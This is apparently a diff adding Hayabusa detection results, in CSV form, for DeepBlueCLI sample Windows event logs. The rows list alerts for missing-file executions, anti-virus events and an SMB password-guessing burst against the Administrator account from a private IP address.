+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc  :  Type: 3  :  Workstation: 6hgtmVlrrFuWtO65  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000064  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gC4ymsKbxVGScMgY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
+2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2q1tdAUlxHGfGH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3EPNzcwy7tOAADWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AbwsMP10Rs4h1Wl1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EEcdqcpqsxQ4RgPx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngdtRwzXXhAlRxGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BbCFZw5qQgU7rQ9W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SXr7lA3MkV6xK36f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tVFs1kR0AuOutnuI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PkeEabFrDLsBVcXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GH7dTevmTKZo46Tq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l2E8JmrfaCj5AjSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N4FLUvawWPVqdLaD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KN0EeUzxSZy5l7J4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8FjH0QHqromIYWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fhlF37S1wNupiX5O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j19XhmSXK526I8kf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IRcppJXDNNfKuvdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0FoGAIAK2FV3zCJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uYWIk76XIksgN3sE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3FEop7o3SOolNvKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMGEM3ql9uov7zCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EFPUA4pUPaLrkr1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7IeJU89jxitz407  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wqj9nXRaDpwCJZO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
